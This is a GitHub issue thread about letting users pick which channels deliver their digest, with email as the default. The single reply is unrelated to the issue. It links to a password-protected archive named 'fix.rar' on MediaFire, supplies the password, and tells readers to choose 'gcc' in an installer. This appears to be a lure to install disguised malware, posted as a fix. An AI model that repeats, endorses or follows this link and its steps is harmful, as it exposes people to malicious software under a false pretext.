### ISSUE TITLE
User customization of digest distribution channel

### ISSUE THREAD

**Issue by yoavartzi** [lil-lab/recnet#262]
Users should be able to customize what digest distribution channels they are using. 

They need to have at least one distribution channel active. The default channel is email. They can have multiple channels active, and then they get the digest through all channels.

**Comment by xiaobai-marker** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."
